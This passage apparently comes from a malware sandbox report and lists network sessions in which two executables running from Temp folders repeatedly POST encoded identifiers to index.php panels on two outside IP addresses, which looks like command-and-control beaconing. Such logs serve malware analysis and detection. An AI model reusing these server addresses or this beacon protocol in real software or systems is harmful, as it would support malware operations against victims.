Jun 27, 2024 05:59:25.922452927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49799	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:26.046849966 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:26.744723082 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:26.745948076 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:26.969391108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49800	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:26.047436953 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:26.681628942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:26.717834949 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:26.908297062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49801	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:27.061764002 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:27.684390068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:27.718116999 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:27.911717892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49802	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:27.181489944 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:27.822382927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:27.861321926 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:28.193747044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49803	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:28.196856022 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:28.836343050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:28.921955109 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:29.113785982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49804	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:28.304017067 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:29.004647017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:29.005332947 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:29.226248980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49805	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:29.230684042 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:29.882643938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:29.883449078 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:30.078910112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49806	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:29.358272076 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:30.059695959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:30.060559988 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:30.284827948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49807	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:30.193676949 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:30.848489046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:30.849148989 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:31.045080900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49808	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:30.411966085 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:31.103629112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:31.108988047 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:31.329591036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49810	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:31.165852070 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:31.796449900 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:31.797441006 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:31.987618923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49811	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:31.447479010 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:32.133095980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:32.139014959 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:32.354500055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49812	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:32.121661901 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:32.753304005 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
